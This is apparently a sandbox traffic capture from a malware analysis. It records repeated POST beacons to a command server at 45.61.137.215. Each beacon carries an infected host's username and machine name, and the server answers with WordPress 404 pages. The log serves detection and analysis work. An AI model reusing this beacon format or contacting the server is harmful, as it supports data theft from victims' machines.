                                            May 29, 2024 15:45:56.033746004 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:45:56.033757925 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:45:56.033768892 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:45:56.033780098 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:45:56.033792019 CEST1120INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                                            Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                                            May 29, 2024 15:45:56.033806086 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:45:56.033816099 CEST1236INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink)
                                            May 29, 2024 15:45:56.033827066 CEST1236INData Raw: 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70
                                            Data Ascii: --white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange
                                            May 29, 2024 15:45:56.033840895 CEST672INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72
                                            Data Ascii: p--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            87192.168.2.94980345.61.137.21580
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:56.184812069 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:56.189771891 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:58.882968903 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:56 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:58.883028030 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:45:58.883081913 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:45:58.883115053 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:45:58.883152962 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:45:58.883187056 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:45:58.883222103 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:45:58.883253098 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:45:58.883285999 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:45:58.883322001 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            88192.168.2.94980445.61.137.21580
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:59.101278067 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:59.106617928 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:46:01.576543093 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:59 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:46:01.576561928 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:46:01.576574087 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:46:01.576591015 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:46:01.576601982 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:46:01.576613903 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                                            Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                                            May 29, 2024 15:46:01.576626062 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                                            Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                                            May 29, 2024 15:46:01.577065945 CEST1236INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                                            Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
                                            May 29, 2024 15:46:01.577078104 CEST1236INData Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                                            Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
                                            May 29, 2024 15:46:01.577090025 CEST1236INData Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                                            Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            89192.168.2.94980545.61.137.21580
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:46:01.734415054 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:46:01.739599943 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:46:04.480976105 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:46:02 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
